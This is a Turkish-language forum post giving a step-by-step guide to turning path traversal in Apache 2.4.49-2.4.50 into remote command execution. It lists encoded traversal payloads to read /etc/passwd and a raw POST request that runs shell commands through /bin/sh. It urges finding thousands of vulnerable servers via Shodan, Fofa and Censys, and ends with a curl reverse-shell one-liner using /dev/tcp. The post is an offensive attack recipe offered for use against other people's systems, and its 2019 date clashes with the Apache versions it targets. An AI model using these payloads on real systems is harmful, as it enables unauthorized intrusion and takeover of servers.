- 15 Ocak 2019
- 303
- 1
- 71
Selamlar, bugün apache 2.4.49-50 arasında çalışan uygulamalar içerisinde bulduğunuz LFI zafieylerinizi rce ye çevireceğiz. Öncelikle hedef site üzerinde lfi aramak için /cgi-bin/ klasörü altına gelelim ve sırası ile ;
/cgi-bin/../../../../../etc/passwd
/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Şeklinde taramalar yapacağız, lakin istekleri GET parametresinden ziyade POST isteği atlmalısınız. Buraya kadar herhangi bir sorun yok, eğer ki LFI zafiyetini bulduysanız şimdi ise request içinde şu şekilde denemeler yapın.
POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: vuln.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
echo;id
Daha fazla bu sistemi kullanan hedefleri aramak istiyorsanız shodan, fofa, hunter, censys gibi alanlar işinizi görecektir, yaklaşık 10.000 den fazla bu yapıyı kullanan mimariyi karşınıza çıkarıp sistemlerde göre testler yapabilirsiniz. örneği burada bırakıyorum.
Artık reverse shell almak için aşağıda verdiğim shell'i kendi ip ve portunuza göre düzenleyin, sisteminizde tünel yapamıyorsanız alternatif olarak localtonet adlı uygulamayı ücretsiz şekilde kullanabilirsiniz.
curl 'http://vuln.com/cgi-bin/../../../../../../../../../bin/bash' -d 'echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/ip/port0>&1' -H "Content-Type: text/plain"